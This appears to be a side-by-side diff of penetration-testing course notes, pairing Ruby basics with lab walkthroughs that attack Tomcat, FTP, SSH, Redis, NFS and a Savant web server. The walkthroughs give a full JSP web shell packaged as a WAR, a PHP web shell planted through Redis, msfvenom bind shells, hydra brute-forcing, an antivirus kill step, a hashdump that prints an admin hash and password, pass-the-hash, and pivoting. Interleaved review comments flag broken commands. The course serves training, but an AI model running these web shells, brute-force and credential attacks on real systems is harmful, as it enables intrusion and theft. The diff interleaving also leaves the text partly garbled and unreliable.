541 | ------ hit enter a few times ------ | |
542 | ||
543 | ------ then type 'out' ----- this closes the file handle... | |
544 | ||
545 | ||
546 | gcc -o boom exploit.c | |
547 | ||
548 | ./boom | |
549 | ||
550 | id | |
551 | ||
552 | ||
553 | ------------------------------- | |
554 | ||
555 | ||
556 | hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 10.0.0.140 http-get /manager/html | |
557 | ||
558 | - | --------------------------Type This----------------------------------- |
558 | + | |
559 | - | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
559 | + | |
560 | - | ----------------------------------------------------------------------- |
560 | + | |
561 | - | - or if you are on a newer version of nmap - |
561 | + | |
562 | - | ---------------------------Type This----------------------------------- |
562 | + | -------------------------------------------index.jsp------------------------------------------- |
563 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
563 | + | <FORM METHOD=GET ACTION='index.jsp'> |
564 | - | ----------------------------------------------------------------------- |
564 | + | <INPUT name='cmd' type=text> |
565 | <INPUT type=submit value='Run'> | |
566 | </FORM> | |
567 | <%@ page import="java.io.*" %> | |
568 | <% | |
569 | String cmd = request.getParameter("cmd"); | |
570 | String output = ""; | |
571 | if(cmd != null) { | |
572 | String s = null; | |
573 | try { | |
574 | - | -----------------------------Type This----------------------------------- |
574 | + | Process p = Runtime.getRuntime().exec(cmd,null,null); |
575 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
575 | + | BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); |
576 | - | ----------------------------------------------------------------------- |
576 | + | while((s = sI.readLine()) != null) { output += s+"</br>"; } |
577 | - | - or if you are on a newer version of nmap - |
577 | + | } catch(IOException e) { e.printStackTrace(); } |
578 | - | ---------------------------Type This----------------------------------- |
578 | + | } |
579 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
579 | + | %> |
580 | - | ---------------------Paste this into the file-------------------------- |
580 | + | <pre><%=output %></pre> |
581 | -------------------------------------------index.jsp------------------------------------------- | |
582 | ||
583 | ***** now pack the webshell ***** | |
584 | ||
585 | ||
586 | ||
587 | mkdir webshell | |
588 | cp index.jsp webshell | |
589 | ||
590 | cd webshell | |
591 | jar -cvf ../webshell.war * | |
592 | ||
593 | ||
594 | Deploy the WAR file using the built-in deploy option on the manager web-page. | |
595 | Once the WAR file is deployed I simply browse to the URL I deployed the WAR file | |
596 | now upload the webshell.war. After uploading, visit page: http://10.0.0.120:8080/webshell/ | |
597 | ||
598 | ||
599 | ||
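Review bot: the target hosts do not match within this section: `hydra -l tomcat ... -s 8080 -vV 10.0.0.140 http-get /manager/html` brute-forces the manager on 10.0.0.140, but the deployment note then says to visit http://10.0.0.120:8080/webshell/, so one of the two addresses is wrong and should be corrected before students follow the steps. The section also says nothing about cleanup: the deployed `webshell` application takes commands from the `cmd` form with no authentication of its own, so the notes should end with undeploying it from the manager page once the exercise is over.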
600 | ****** This section isn't finished ****** | |
601 | ||
602 | cd ~/toolz/metasploit | |
603 | ||
604 | - | --------------------------Type This----------------------------------- |
604 | + | ./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war |
605 | - | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
605 | + | |
606 | - | ----------------------------------------------------------------------- |
606 | + | jar tf ~/bind7777.war |
607 | - | - or if you are on a newer version of nmap - |
607 | + | |
608 | - | ---------------------------Type This----------------------------------- |
608 | + | ****** This section isn't finished ****** |
609 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
609 | + | |
610 | - | ----------------------------------------------------------------------- |
610 | + | Google is your friend hahahahahahahah........ |
611 | ||
612 | ||
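Review bot: `****** This section isn't finished ******` appears twice around the msfvenom lines, once before `cd ~/toolz/metasploit` and again after `jar tf ~/bind7777.war`; keep one. The steps stop at listing the WAR contents with `jar tf` and say nothing further, so the remaining marker should state plainly that the rest of this part is not yet covered, rather than leaving students to guess whether a step is missing.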
613 | ################# | |
614 | # Attacking FTP # | |
615 | ################# | |
616 | ||
617 | sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120 | |
618 | - | ---------------------------Type This----------------------------------- |
618 | + | |
619 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
619 | + | cd ~/toolz/hydra |
620 | - | ----------------------------------------------------------------------- |
620 | + | |
621 | - | - or if you are on a newer version of nmap - |
621 | + | hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 10.0.0.120 ftp |
622 | - | ---------------------------Type This----------------------------------- |
622 | + | |
623 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
623 | + | ftp |
624 | - | ---------------------Paste this into the file-------------------------- |
624 | + | open 10.0.0.120 |
625 | admin | |
626 | admin | |
627 | pwd | |
628 | ls -lah | |
629 | ||
630 | ls ../../ | |
631 | ||
632 | ||
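Review bot: the port is inconsistent within the FTP section: `sudo nmap -sV -Pn -p25 ...` and `hydra -l admin ... -u -s 25 10.0.0.120 ftp` both use 25, which is the SMTP port, while `open 10.0.0.120` in the interactive ftp client connects to the default port 21. If the lab FTP service really listens on 25, the `open` line needs the port as well; otherwise the two `25` values should be 21. Either way the section should say which it is, since the `ftp-anon`/`ftp-bounce` scripts only make sense against an FTP listener.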
633 | ################# | |
634 | # Attacking SSH # | |
635 | ################# | |
636 | cd ~/toolz/hydra | |
637 | ||
638 | hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 10.0.0.120 ssh | |
639 | ||
640 | ssh -p 1322 admin@10.0.0.120 | |
641 | ||
642 | ||
643 | ||
644 | ||
645 | cd ~/toolz/metasploit | |
646 | ||
647 | ./msfconsole | |
648 | ||
649 | use auxiliary/scanner/ssh/ssh_users | |
650 | ||
651 | set USER_FILE /home/infosecaddicts/list.txt | |
652 | ||
653 | - | --------------------------Type This----------------------------------- |
653 | + | set STOP_ON_SUCCESS true |
654 | - | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
654 | + | |
655 | - | ----------------------------------------------------------------------- |
655 | + | set RHOSTS 10.0.0.120 |
656 | - | - or if you are on a newer version of nmap - |
656 | + | |
657 | - | ---------------------------Type This----------------------------------- |
657 | + | set RPORT 1322 |
658 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
658 | + | |
659 | - | ----------------------------------------------------------------------- |
659 | + | run |
660 | ||
661 | ||
662 | ||
663 | - | ################## |
663 | + | |
664 | - | # Day 2 Homework # |
664 | + | |
665 | - | ################## |
665 | + | use auxiliary/scanner/ssh/ssh_login |
666 | - | Take screenshots of you performing all of the day 2 tasks above |
666 | + | |
667 | set USER_FILE /home/infosecaddicts/list.txt | |
668 | - | Take screenshots of you performing all of the tasks above. |
668 | + | |
669 | set PASS_FILE /home/infosecaddicts/list.txt | |
670 | - | In order to receive your certificate of proficiency you must complete all of the tasks covered in the Advanced Pentester Night School pastebin (http://pastebin.com/qnmbj04m). |
670 | + | |
671 | set STOP_ON_SUCCESS true | |
672 | - | Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Pentester-Night-School-Day2-Homework.docx) |
672 | + | |
673 | set RHOSTS 10.0.0.120 | |
674 | ||
675 | set RPORT 1322 | |
676 | ||
677 | - | IMPORTANT NOTE: |
677 | + | run |
678 | - | Your homework/challenges must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST this coming Sunday. |
678 | + | |
679 | ||
680 | sessions -l | |
681 | ||
682 | - | ############################################################ |
682 | + | sessions -u 1 |
683 | - | # Section 1: Ruby Fundamentals and Metasploit Architecture # |
683 | + | |
684 | - | ############################################################ |
684 | + | |
685 | ||
686 | - | ################################ |
686 | + | id |
687 | - | # Chapter 1: Ruby Fundamentals # |
687 | + | |
688 | - | ################################ |
688 | + | |
689 | ||
690 | ######################## | |
691 | # Attacking phpMyAdmin # | |
692 | - | - Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer |
692 | + | ######################## |
693 | - | scientist and programmer from Japan. It is a cross-platform dynamic language. |
693 | + | ****** This section isn't finished ****** |
694 | ||
695 | - | - The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby |
695 | + | hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://10.0.0.120 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema" |
696 | - | on Rails is a framework that is written in Ruby. |
696 | + | |
697 | ****** This section isn't finished ****** | |
698 | - | - Ruby's file name extensions are .rb and .rbw. |
698 | + | |
699 | Google is your friend hahahahahahahah........ | |
700 | - | - official website of this |
700 | + | |
701 | ||
702 | - | - language: www.ruby-lang.org. |
702 | + | |
703 | ||
704 | wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py | |
705 | - | - interactive Shell called Ruby Shell |
705 | + | |
706 | python pmabf.py http://10.0.0.120 root list.txt (this gave me the WRONG password) | |
707 | ||
708 | - | - Installing and Running IRB |
708 | + | |
709 | ||
710 | ||
711 | - | - open up the interactive console and play around. |
711 | + | |
712 | ||
713 | #################### | |
714 | - | irb |
714 | + | # Attacking Joomla # |
715 | #################### | |
716 | cd ~/toolz/metasploit | |
717 | ||
718 | - | - Math, Variables, Classes, Creating Objects and Inheritance |
718 | + | |
719 | ||
720 | use use auxiliary/scanner/http/joomla_plugins | |
721 | - | # following arithmetic operators: |
721 | + | |
722 | - | - Addition operator (+) — 10 + 23 |
722 | + | set RHOSTS 10.0.0.120 |
723 | - | - Subtraction operator (-) — 1001 - 34 |
723 | + | |
724 | - | - Multiplication operator (*) — 5 * 5 |
724 | + | set RPORT 8080 |
725 | - | - Division operator (/) — 12 / 2 |
725 | + | |
726 | run | |
727 | ||
728 | ||
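Review bot: `use use auxiliary/scanner/http/joomla_plugins` repeats `use`; msfconsole will try to load a module named `use` and fail, so the line should read `use auxiliary/scanner/http/joomla_plugins`. Also, the phpMyAdmin section places `****** This section isn't finished ******` before its commands while this one places it after `run`; putting the marker in the same position in both sections makes it clear which parts are incomplete before students start typing.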
729 | - | # Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment |
729 | + | ****** This section isn't finished ****** |
730 | - | operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by |
730 | + | Google is your friend hahahahahahahah........ |
731 | - | 30. Again, 69 is assigned to y, and then y is incremented by 33. |
731 | + | |
732 | ##################### | |
733 | - | x = 25 |
733 | + | # Attacking Jenkins # |
734 | - | x + 30 |
734 | + | |
735 | - | y = 69 |
735 | + | |
736 | - | y+33 |
736 | + | |
737 | ****** This section isn't finished ****** | |
738 | Google is your friend hahahahahahahah........ | |
739 | ||
740 | ################# | |
741 | - | - Let's look at creating classes and creating objects. |
741 | + | # Attacking NFS # |
742 | ################# | |
743 | - | - Here, the name of the class is infosecaddicts. An object has its properties and methods. |
743 | + | rpcinfo -s 10.0.0.120 |
744 | ||
745 | showmount -e 10.0.0.120 | |
746 | ||
747 | - | class Attack |
747 | + | mount -t nfs 10.0.0.120:/backup /tmp/nfs -o nolock |
748 | - | attr_accessor :of, :sqli, :xss |
748 | + | |
749 | ls /tmp/nfs | |
750 | ||
751 | - | - Now that we have created the classes let's create the objects |
751 | + | cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts |
752 | umount -l /tmp/nfs | |
753 | - | first_attack = Attack.new |
753 | + | |
754 | - | first_attack.of = "stack" |
754 | + | sudo apt-cache search fcrackzip |
755 | - | first_attack.sqli = "blind" |
755 | + | |
756 | - | first_attack.xss = "dom" |
756 | + | sudo apt-get install -y fcrackzip |
757 | - | puts first_attack.of |
757 | + | |
758 | - | puts first_attack.sqli |
758 | + | fcrackzip -D -p /home/infosecaddicts/list.txt |
759 | - | puts first_attack.xss |
759 | + | |
760 | unzip -P aaaaaa backup.tar.bz2.zip | |
761 | ||
762 | tar -zxvf backup.tar.bz2 | |
763 | ||
764 | ||
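Review bot: `mount -t nfs 10.0.0.120:/backup /tmp/nfs -o nolock` assumes the mount point exists, but no `mkdir /tmp/nfs` precedes it, and `mount` normally needs root while only the apt commands in this section use `sudo`; add the mkdir and run the mount with sudo. `fcrackzip -D -p /home/infosecaddicts/list.txt` is missing the archive it is supposed to work on, and the very next line already supplies the password with `unzip -P aaaaaa backup.tar.bz2.zip`, so as written the cracking step neither runs nor is needed; either complete it or drop it. Finally, `tar -zxvf backup.tar.bz2` passes the gzip flag to a bzip2 archive; `tar -jxvf backup.tar.bz2` (or plain `tar -xvf`, which autodetects the compression) is what was meant.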
765 | - | - Let's work on some inheritance that will help make your programming life easier. When we have multiple classes, |
765 | + | |
766 | - | inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which |
766 | + | # Attacking Redis # |
767 | - | one object can access the properties/attributes of another object of a different class. Inheritance makes your |
767 | + | |
768 | - | programming life easier by maximizing code reuse. |
768 | + | sudo nmap -p 6379 --script=redis-info 10.0.0.120 |
769 | infosecaddicts | |
770 | ||
771 | sudo apt-get install -y redis-tools | |
772 | - | class Exploitframeworks |
772 | + | |
773 | - | attr_accessor :scanners, :exploits, :shellcode, :postmodules |
773 | + | |
774 | redis-cli -h 10.0.0.120 | |
775 | - | class Metasploit < Exploitframeworks |
775 | + | |
776 | CONFIG SET dir /var/www/html/main | |
777 | - | class Canvas < Exploitframeworks |
777 | + | |
778 | CONFIG GET dir | |
779 | - | class Coreimpact < Exploitframeworks |
779 | + | |
780 | config set dbfilename bomba.php | |
781 | - | class Saint < Exploitframeworks |
781 | + | |
782 | CONFIG GET dbfilename | |
783 | - | class Exploitpack < Exploitframeworks |
783 | + | |
784 | SET cmd "<?php system($_GET['joe']); ?>" | |
785 | ||
786 | BGSAVE | |
787 | ||
788 | http://10.0.0.120/bomba.php | |
789 | ||
790 | - | - Methods, More Objects, Arguments, String Functions and Expression Shortcuts |
790 | + | http://10.0.0.120/bomba.php?joe=id |
791 | ||
792 | - | - Let's create a simple method. A method is used to perform an action and is generally called with an object. |
792 | + | |
793 | (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh" | |
794 | - | - Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called, |
794 | + | |
795 | - | it will print this string: "We are Learning how to PenTest" |
795 | + | |
796 | ||
797 | - | - An object named 'bo' is created, which is used to call the method. |
797 | + | ****** This section isn't finished ****** |
798 | Google is your friend hahahahahahahah........ | |
799 | ||
800 | - | |
800 | + | |
801 | - | class Msfnl |
801 | + | |
802 | - | def learning |
802 | + | |
803 | - | puts "We are Learning how to PenTest" |
803 | + | |
804 | use auxiliary/scanner/redis/file_upload | |
805 | ||
806 | set RHOSTS 10.0.0.120 | |
807 | ||
808 | set LocalFile | |
809 | - | - Now let's define an object for our Method |
809 | + | |
810 | ****** This section isn't finished ****** | |
811 | - | joe = Msfnl.new |
811 | + | |
812 | - | joe.learning |
812 | + | |
813 | ||
814 | ||
815 | ||
816 | ||
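Review bot: `(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"` is malformed: the closing double quote has no opening one and `foo.txt/.ssh` treats a file name as a directory, so the shell rejects the line. It also sits between the `bomba.php` steps and a second `****** This section isn't finished ******` with no text explaining it, and in the `auxiliary/scanner/redis/file_upload` block below `set LocalFile` has no value. Leave only the unfinished marker for that part so the stray line does not look like a working command, and keep a single marker rather than two.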
817 | - | - An argument is a value or variable that is passed to the function while calling it. In the following example, while |
817 | + | #################################### |
818 | - | calling the puts() function, we are sending a string value to the function. This string value is used by the |
818 | + | # Finally, let's exploit something # |
819 | - | function to perform some particular operations. |
819 | + | #################################### |
820 | ||
821 | - | puts ("Pentesting") |
821 | + | nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}' |
822 | ||
823 | nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15 | |
824 | ||
825 | https://www.exploit-db.com/search | |
826 | ||
827 | - | - shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated |
827 | + | Search for: |
828 | - | assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following |
828 | + | Savant httpd 3.1 |
829 | - | statements to understand the shortcuts. |
829 | + | Apache httpd 2.0.58 ((Win32)) |
830 | ||
831 | - | g = 70 |
831 | + | |
832 | - | g = g+44 |
832 | + | Found one written in Python: |
833 | - | g += 33 |
833 | + | https://www.exploit-db.com/exploits/18401/ |
834 | ||
835 | - | - In the above statement, g is incremented by 33 and then the total value is assigned to g. |
835 | + | Found one for Savant 3.1 from Metasploit: |
836 | https://www.exploit-db.com/exploits/16770/ | |
837 | - | g *= 3 |
837 | + | |
838 | ||
839 | - | - In the above statement, g is multiplied with 3 and then assigned to g. |
839 | + | |
840 | cd ~/toolz/metasploit | |
841 | - | - Example |
841 | + | |
842 | use exploit/windows/http/savant_31_overflow | |
843 | - | - Comparison Operators, Loops, Data Types, and Constants |
843 | + | set RHOST 10.0.0.15 |
844 | set PAYLOAD windows/meterpreter/bind_nonx_tcp | |
845 | - | - Comparison operators are used for comparing one variable or constant with another variable or constant. We will show |
845 | + | set RPORT 80 |
846 | - | how to use the following comparison operators. |
846 | + | |
847 | - | 'Less than' operator (<): This operator is used to check whether a variable or constant is less than another |
847 | + | |
848 | - | variable or constant. If it's less than the other, the 'less than' operator returns true. |
848 | + | |
849 | - | 'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable |
849 | + | |
850 | - | or constant. If it's equal to the other, the 'equal to' operator returns true. |
850 | + | |
851 | - | 'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another |
851 | + | |
852 | - | variable or constant. If it's not equal to the other, the 'not equal to' operator returns true. |
852 | + | |
853 | ||
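Review bot: the Metasploit block stops after `set RPORT 80` and jumps straight to `meterpreter> ipconfig`; the `exploit` command that runs `exploit/windows/http/savant_31_overflow` and produces the meterpreter session is missing here, whereas the psexec block later does end with `exploit`. The lead-in should also say that 10.0.0.15 is the host whose banner matched `Savant httpd 3.1` in the `nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'` sweep, since otherwise the jump from a /24 sweep to one address is unexplained.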
854 | ********************************** Figure out who and where you are ********************************** | |
855 | - | numberofports = 55 |
855 | + | |
856 | - | puts "number of ports found during scan" if numberofports < 300 |
856 | + | |
857 | - | numberofports = 400 |
857 | + | |
858 | - | puts "number of ports found during scan" if numberofports < 300 |
858 | + | |
859 | - | puts "number of ports found during scan" if numberofports == 300 |
859 | + | |
860 | - | puts "number of ports found during scan" if numberofports != 300 |
860 | + | |
861 | - | Example |
861 | + | |
862 | meterpreter> ipconfig | |
863 | ||
864 | - | - the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator. |
864 | + | |
865 | meterpreter> run post/windows/gather/checkvm | |
866 | - | - This operator is generally used to combine multiple conditions. |
866 | + | |
867 | - | - In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the |
867 | + | |
868 | meterpreter> run get_local_subnets | |
869 | - | - following example to understand how this operator works. |
869 | + | |
870 | ||
871 | - | ports = 100 |
871 | + | |
872 | - | puts "number of ports found on the network" if ports<100 || ports>200 |
872 | + | |
873 | - | puts "number of ports found on the network" if ports<100 || ports>75 |
873 | + | |
874 | ||
875 | meterpreter> use priv | |
876 | - | # unless |
876 | + | |
877 | ||
878 | - | portsbelow1024 = 50 |
878 | + | |
879 | - | puts "If the ports are below 1024" unless portsbelow1024 < 1000 |
879 | + | |
880 | - | puts "If the ports are below 1024" unless portsbelow1024 < 1055 |
880 | + | |
881 | - | puts "If the ports are below 1024" unless portsbelow1024 < 20 |
881 | + | |
882 | meterpreter > getuid | |
883 | Server username: NT AUTHORITY\SYSTEM | |
884 | - | - The 'unless' keyword is used to do something programmatically unless a condition is true. |
884 | + | |
885 | -------------------------------------------------------- | |
886 | ||
887 | meterpreter> run killav | |
888 | - | - Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times. |
888 | + | |
889 | meterpreter> run post/windows/gather/hashdump | |
890 | - | - See the following example to understand how a string is printed 10 times on the screen using a loop. |
890 | + | |
891 | Got the following admin hash: | |
892 | - | 10.times do puts "infosecaddicts" end |
892 | + | Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363::: |
893 | ||
894 | - | # Or use the curly braces |
894 | + | |
895 | ||
896 | - | 10.times {puts "infosecaddicts"} |
896 | + | |
897 | ||
898 | meterpreter > kerberos | |
899 | ||
900 | - | - Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while |
900 | + | This should give me the administrative password: |
901 | - | working with different data types. Data type conversion is also known as type casting. |
901 | + | )K5?Jocb(Yx |
902 | ||
903 | ||
904 | ********************************** Enumerate the host you are on ********************************** | |
905 | - | - In the following example, a and b are integers. So when a is divided by b, an integer division is performed. As a |
905 | + | |
906 | - | result, 23/25 becomes 0. |
906 | + | meterpreter> run winenum |
907 | ||
908 | - | - On the other hand, the integer variables c and d are converted to float. So the division gives the result in decimal |
908 | + | |
909 | - | points. |
909 | + | |
910 | meterpreter > run post/windows/gather/enum_logged_on_users | |
911 | - | 24/4 |
911 | + | |
912 | - | 14.0/5.0 |
912 | + | |
913 | - | a = 23 |
913 | + | |
914 | - | b = 25 |
914 | + | |
915 | - | print a/b |
915 | + | |
916 | - | c = 26 |
916 | + | |
917 | - | d = 33 |
917 | + | |
918 | - | print c.to_f/d.to_f |
918 | + | |
919 | ||
920 | ||
921 | ********************************** Get out of Meterpreter ********************************** | |
922 | ||
923 | - | - Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you |
923 | + | |
924 | - | change the value of a constant, you will see a warning message. |
924 | + | |
925 | msf exploit(savant_31_overflow) > back | |
926 | ||
927 | msf> | |
928 | ||
929 | - | - Multiple Line String Variable, Interpolation, and Regular Expressions |
929 | + | |
930 | ||
931 | - | - A multiple line string variable lets you assign the value to the string variable through multiple lines. |
931 | + | |
932 | ********************************** Lateral Movement ******************************* | |
933 | - | infosecaddicts = <<mark |
933 | + | |
934 | - | welcome |
934 | + | |
935 | - | to the |
935 | + | |
936 | - | best |
936 | + | |
937 | - | metasploit |
937 | + | |
938 | - | course |
938 | + | |
939 | - | on the |
939 | + | |
940 | - | market |
940 | + | set SMBUser Administrator |
941 | - | mark |
941 | + | |
942 | - | puts infosecaddicts |
942 | + | set SMBPass )K5?Jocb(Yx |
943 | ||
944 | set RHOST 10.0.0.15 | |
945 | ||
946 | - | - Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that |
946 | + | set payload windows/meterpreter/bind_tcp |
947 | - | it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position. |
947 | + | |
948 | - | Examine the following example to understand how interpolation works in Ruby. |
948 | + | |
949 | ||
950 | exploit | |
951 | ||
952 | - | a = 4 |
952 | + | ********************************** Get out of Meterpreter ********************************** |
953 | - | b = 6 |
953 | + | |
954 | - | puts "a * b = a*b" |
954 | + | |
955 | - | puts " #{a} * #{b} = #{a*b} " |
955 | + | |
956 | - | person = "Joe McCray" |
956 | + | msf exploit(psexec) >back |
957 | - | puts "IT Security consultant person" |
957 | + | |
958 | - | puts "IT Security consultant #{person}" |
958 | + | msf> |
959 | ||
960 | - | - Notice that the placeholders inside #{ } are evaluated and they are replaced with their values. |
960 | + | ********************************** |
961 | ||
962 | -- Option 2: | |
963 | - | - Regular expression is a powerful technique for text searching and text manipulation. Ruby provides built-in support |
963 | + | |
964 | - | for regular expressions through the Regexp class. So the regular expressions in Ruby are the objects of Regexp type. |
964 | + | |
965 | set SMBUser Administrator | |
966 | ||
967 | set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363 | |
968 | - | - In regular expressions, we define patterns to perform text search and advanced text manipulations. String literals |
968 | + | |
969 | - | and metacharacters constitute a pattern. // characters mark the beginning and end of a pattern in Ruby. |
969 | + | set payload windows/meterpreter/bind_tcp |
970 | - | The following example shows how the substring "today" |
970 | + | |
971 | - | is placed in the main string. |
971 | + | set RHOST 10.0.0.15 |
972 | ||
973 | - | a = "Woot Woot, we are learning regular expressions!!" |
973 | + | |
974 | - | puts a.sub(/^..../, 'Today') |
974 | + | |
975 | - | puts a.sub(/^..../, 'Today') |
975 | + | |
976 | ||
977 | ||
978 | ||
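Review bot: both lateral-movement options set `SMBUser`, `SMBPass`, `RHOST` and the payload but never select a module; the only hint is the later prompt `msf exploit(psexec) >back`, so the `use` line for the psexec module shown in that prompt should precede `set SMBUser Administrator` in each option. Option 2 passes the `LM:NT` pair from the hashdump line as `SMBPass` instead of the cleartext obtained from `kerberos`, which is presumably why two options are shown, but nothing in the text says so; one sentence stating that difference would make the exercise self-explanatory. The `********************************** Get out of Meterpreter **********************************` banner also appears here for a second time, and the bare `**********************************` line after `msf>` is an empty banner; one of them can go.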
979 | - | - Let's Loop the expressions. This example shows how to loop the expressions. |
979 | + | ********************************** Set up your Pivot ********************************** |
980 | ||
981 | - | a.scan(/...../) {|w| puts w} |
981 | + | meterpreter > background |
982 | - | a.scan(/\S\S/) {|w| puts w} |
982 | + | <-- background the session |
983 | You want to get back to this prompt: | |
984 | msf exploit(handler) > back <--- you need to get to main msf> prompt | |
985 | ||
986 | - | - Character classes |
986 | + | |
987 | ||
988 | - | infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities" |
988 | + | sessions -l <--find a session you want to pivot through (note the IP and session number) |
989 | - | "I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y} |
989 | + | |
990 | - | "I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y} |
990 | + | Now set up Pivot with a route add |
991 | --------------------------------- | |
992 | ||
993 | route print <--- should be blank | |
994 | - | - Arrays, Push and Pop, and Hashes |
994 | + | |
995 | route add 10.0.0.15 255.255.255.0 1 <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter) | |
996 | ||
997 | - | - In the following example, numbers is an array that holds 6 integer numbers. |
997 | + | |
998 | route print <----- verify new route | |
999 | ||
1000 | ******************************Scan through your Pivot ****************************** | |
1001 | - | numbers = [2,4,6,8,10,100] |
1001 | + | |
1002 | - | puts numbers[0] |
1002 | + | use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot |
1003 | - | puts numbers[4] |
1003 | + | |
1004 | - | numbers[2] = 150 |
1004 | + | set THREADS 10 |
1005 | - | puts numbers |
1005 | + | |
1006 | set RHOSTS 10.0.0.0/24 <-- Keep changing this IP and re-running the scan until you find something you want to attack | |
1007 | ||
1008 | set PORTS 445 | |
1009 | ||
1010 | - | - Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop. |
1010 | + | run |
1011 | ||
1012 | ||
1013 | #################################### | |
1014 | - | framework = [] |
1014 | + | # Socks Tunneling with Proxychains # |
1015 | - | framework << "modules" |
1015 | + | #################################### |
1016 | - | framework << "exploits" |
1016 | + | --- Open a duplicate putty session to your Ubuntu host |
1017 | - | framework << "payloads" |
1017 | + | |
1018 | - | framework.pop |
1018 | + | sudo apt-get install -y proxychains |
1019 | infosecaddicts | |
1020 | ||
1021 | - | - Hash is a collection of elements, which is like the associative array in other languages. Each element has a key |
1021 | + | sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 1080 |
1022 | - | that is used to access the element. |
1022 | + | |
1023 | ||
1024 | Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it. | |
1025 | - | - Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes. |
1025 | + | socks4 127.0.0.1 1080 |
1026 | - | In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the |
1026 | + | |
1027 | - | respective values: 'what module should you use', 'Windows XP' and 'SSH'. |
1027 | + | ***************************Set up a Socks Proxy through your Pivot ************************* |
1028 | ||
1029 | ||
1030 | - | metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'} |
1030 | + | use auxiliary/server/socks4a |
1031 | - | print metasploit.size |
1031 | + | |
1032 | - | print metasploit["microsoft"] |
1032 | + | set SRVHOST 127.0.0.1 |
1033 | - | metasploit['microsoft'] = 'redhat' |
1033 | + | |
1034 | - | print metasploit['microsoft'] |
1034 | + | set SRVPORT 1080 |
1035 | ||
1036 | run | |
1037 | ||
1038 | - | - Writing Ruby Scripts |
1038 | + | --- Go back to your other putty session with the meterpreter shell |
1039 | cd ~ | |
1040 | ||
1041 | - | - Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what |
1041 | + | proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24 <--- This is going to be really slow |
1042 | - | this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that |
1042 | + | |
1043 | - | someone made to look for a specific port. The port that it is looking for is port 21 FTP. |
1043 | + | proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24 <--- This is going to be really slow |
1044 | ||
1045 | - | cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan |
1045 | + | |
1046 | - | ls |
1046 | + | ---close the duplicate putty session to your Ubuntu host |
